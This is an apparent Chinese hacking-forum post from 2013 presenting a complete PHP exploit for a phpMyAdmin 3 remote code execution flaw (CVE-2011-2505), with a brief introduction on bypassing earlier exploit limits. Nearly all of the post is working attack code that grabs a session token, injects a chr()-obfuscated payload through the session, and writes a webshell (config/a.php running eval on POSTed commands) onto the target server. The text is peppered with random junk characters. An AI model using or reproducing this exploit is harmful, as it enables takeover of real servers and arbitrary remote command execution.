找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2214|回复: 0
打印 上一主题 下一主题

phpadmin3 remote code execute php版本exploit

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。6 P! a% n0 |3 b; H9 s
) X0 y. P* J1 S5 H& g
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。; X' l% X' r$ n3 I6 z- v; x' L2 i

" w* Z. e- y  h9 v% L- R首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:' F- l" u( A: l4 d
一是session.auto_start = 1;' ?1 C; B: Q( @+ y1 g8 X9 q6 q
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。' e1 q* N; V  f. \3 y( E
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
! y: M, s% y0 D7 g0 X3 [0 H. u7 n
) {+ m$ B- M, d在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。* b# f1 m9 H& }* b" J6 Q; c

) ~" q* `) L7 k: j6 z/ r6 c于是写了这个php版本的exp,代码如下:& i! U  o9 B& K3 g: Y- r

& P! o% @! c" X#!/usr/bin/php
  p; f* D  [% e1 o<?php/ I; |1 k+ S# U; z
print_r('
  v( w+ v0 L1 u8 I( C4 T- J+---------------------------------------------------------------------------+
& ^- v) ^; D; G7 D" Jpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]$ @& s; a6 E6 K4 {
by oldjun(www.oldjun.com)8 B  P9 g5 f( C
welcome to www.t00ls.net, f: D' C) K5 K; b7 c, h6 x
mail: oldjun@gmail.com
- \: P8 I8 i+ v& T5 NAssigned CVE id: CVE-2011-2505
: }0 b0 n7 Y1 ^- f. A2 i+---------------------------------------------------------------------------+
. t, u9 L" g/ g0 `');  N) C- d$ D5 S  e& ]

- Y- t. e/ N' c6 S: z* G/**# C$ V- b. E0 A7 u
* working when the directory:"config" exists and is writeable.
8 M. n! Q8 W( b3 n5 @**/
( L9 T6 j8 Q% F% d $ l2 _5 {1 x( g! S
if ($argc < 3) {! S( H' @, N8 O! r
    print_r('
0 {; A2 w; Y( l& c+---------------------------------------------------------------------------+& A8 q* e7 h6 o1 T5 p: T+ G! j
Usage: php '.$argv[0].' host path) u! T! x0 m' G& i* b0 Z
host:      target server (ip/hostname)* g! d0 O3 V) U3 f; {; O8 @
path:      path to pma3
) k. [+ A6 ~" f) u# PExample:" ~& X  Y; a8 c# e
php '.$argv[0].' localhost /pma/4 N; p( M) D/ v7 e7 c
+---------------------------------------------------------------------------+4 C! G. R  Z, A/ T9 k: R  E; e
');2 |) A" M0 m& u
    exit;( k0 H6 `, J& |& `
}% B4 ?* J! J/ ^6 D( f/ \' J, L1 r$ x
2 {( G# N! p! [+ v1 J5 C8 `" `
$host = $argv[1];
8 R. O( h) o7 e  D& N8 ?$path = $argv[2];
' m3 y5 N! `3 ]
0 O0 ~% b6 W# |* u/**
5 [4 P$ ~0 ^+ [; O; H1 t/ b8 }" m! Y * Try to determine if the directory:"config" exists
" Q0 v. v8 h1 Z9 I8 K- Y9 r**/
6 q2 W% P7 t" o$ Gecho "[+] Try to determine if the directory:config exists....\n";
: x6 n. C# `, Y+ z# }$returnstr=php_request('config/');$ l9 ~  |2 R- {6 i1 H
if(strpos($returnstr,'404')){
- T# E8 x7 B: j/ C; O: {2 L    exit("[-] Exploit Failed! The directory:config do not exists!\n");4 d8 M# T7 \% v% V
}
- n  q- t/ R1 F; d0 X$ [# a# {, T# e$ t. P
/**: a7 e0 m! ]$ T$ ?+ Z
* Try to get token and sessionid
& g5 V% ~) |% c6 H**/
7 X" f: X& v! |1 @3 y* J/ n# Uecho "[+] Try to get token and sessionid....\n";' o) h& Y& l. C# D. q8 k1 ~0 c
$result=php_request('index.php');2 C8 |% u7 r7 ~' O7 E0 c1 X
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);) ], k- O) b! q7 H' Z
$token=$resp[3];" T7 |- @0 u. x/ ~4 L* @
$sessionid=$resp[1];
7 L8 S3 k" k( p* uif($token && $sessionid){4 B6 m4 @2 C' c6 L& g
    echo "[+] tokentoken\n";
) }  I" ?3 ^4 ~. \( G$ j    echo "[+] Session IDsessionid\n";
! |3 }/ N' C, D- x1 ?}else{
' g3 S" U' \" ]4 H: e  X0 p7 @7 [5 j    exit("[-] Can't get token and Session ID,Exploit Failed!\n");/ O) h3 c! W! {( a; S+ p* I" f" P
}' A4 y/ p( |8 s

2 |* q3 i$ @) j- b( ^/**# q( x$ z- J+ u
* Try to insert shell into session0 [: H) A8 x( Z
**/* B8 q' l9 t% W' \/ }9 p- o( v
echo "[+] Try to insert shell into session....\n";, T5 I( _0 G; @0 Q' F9 d
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.) g9 i# s9 q9 P2 C# Y. a/ `* C

' b1 L; I7 C, a9 R- Z' F/**
: a. l8 ?3 V. R$ O+ x) [' Z/ c * Try to create webshell
& Q4 W) A( w8 N, R" _. u) P3 A**/7 W0 u0 ~2 Q" o3 ]
echo "[+] Try to create webshell....\n";
- L8 v: E! |, ~php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
5 Q# p2 I5 g! i1 S5 r/**
/ ^3 c$ `  X9 C( b * Try to check if the webshell was created successfully; u& V, I9 O( }8 |$ R9 U8 c
**/0 ?% n$ F) D  _% U$ I$ _; W
echo "[+] Try to check if the webshell was created successfully....\n";/ k9 ]! o5 p, }3 b# Q" T: `
$content=php_request('config/config.inc.php');! j2 F: x0 y: V5 K
if(strpos($content,'t00ls')){, G! v5 m% d6 Z  K* [8 k  R
    echo "[+] Congratulations! Expoilt successfully....\n";) ]# t  |$ H: u
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
  t! s6 ?' s/ n2 x# l+ e}else{) B& B* A5 X7 E; T$ X
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
) H1 n, Q: n+ c5 u" P}
' k9 ?2 y& M5 }$ k* O3 U0 y4 x  Q/ a3 S9 |' L7 k4 i& _) N6 o+ V% J
function php_request($url,$data='',$cookie=''){! \/ q, }" S1 S
    global  $host, $path;/ U" o* F  n4 T2 s! T& ]' n& |5 W
    5 p* {& H" P' f
    $method=$data?'POST':'GET';
. f( x( {/ \! p! h, F( X    " P4 p7 r9 R8 Q6 ?- a0 |
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";7 A+ _  E1 @2 c
    $packet .= "Accept: */*\r\n";, Q7 l7 Y/ G# C  a; N/ `, T: L
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
9 f9 ^. d$ Q2 E/ u0 A! \3 ^' Z    $packet .= "Host: $host\r\n";0 ~  R0 v" o% Q* z! d1 c; M
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";' A% U7 @, A: h" ]- j4 L5 t
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";3 D8 O$ h( c, G
    $packet .= $cookie?"Cookie: $cookie\r\n":"";3 O! R' r8 y! z$ N0 P6 G
    $packet .= "Connection: Close\r\n\r\n";# h0 g% P$ L. E; G
    $packet .= $data?$data:"";, B6 P1 Z- H2 `8 d9 q& [8 R) y0 l) Q
4 t9 _2 h4 S8 {$ X9 d
    $fp = fsockopen(gethostbyname($host), 80);
  K& |( b3 I2 _* ?$ M& D    if (!$fp) {% B$ o) n/ N. h- W9 x- x% K
    echo 'No response from '.$host; die;
2 K$ c1 }% J! }0 r7 r    }- K3 R. {; B4 o, z& }2 `. K% o, @
    fputs($fp, $packet);
$ S1 Z5 E5 S$ o4 R/ n0 J! y* C. s7 n& D/ I0 v$ r) U3 Z$ L
    $resp = '';
4 R: `( F4 ]% F! c" \9 L: x6 {3 m! o, ]( T+ P; L
    while ($fp && !feof($fp))
  m; n& ^/ C$ P+ ?* E# ~. u        $resp .= fread($fp, 1024);
* I) U2 P/ Y+ h$ P0 b+ |/ }) @+ G( ?" D6 ^  `8 T$ E
    return $resp;/ S/ _2 J" G" A4 i: J
}
* L% P* e# w& E0 e2 |    # ]5 @  ^/ }, t/ n: S( {* D
?> 5 I1 i, }& j; q0 X9 Q- X3 o
.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表